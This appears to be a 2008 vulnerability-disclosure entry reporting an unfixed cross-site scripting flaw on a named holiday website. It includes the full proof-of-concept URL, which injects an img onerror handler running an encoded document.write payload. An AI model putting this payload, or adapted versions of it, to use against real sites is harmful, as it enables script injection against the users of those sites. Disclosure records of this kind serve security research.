Security researcher Babaconda, has submitted on 08/08/2008 a cross-site-scripting (XSS) vulnerability affecting www.holiday.com, which at the time of submission ranked 642074 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 15/08/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 08/08/2008 |
Date published: 15/08/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: Babaconda |
Domain: www.holiday.com |
Category: XSS |
Pagerank: 642074 |
URL: http://www.holiday.com/info/contact/jobs.php?regarding=jobs&name=xss%3Cimg%20src=xss.gif%20onerror=d ocument.write(String.fromCharCode(120,115,115,101,100,32,98,121,32,98,97,98,97,99,111,110,100,97)).s ource%3E&email=xss%40xss.com&phone=xss&comment=xss |
Click here to view the mirror
|
|
|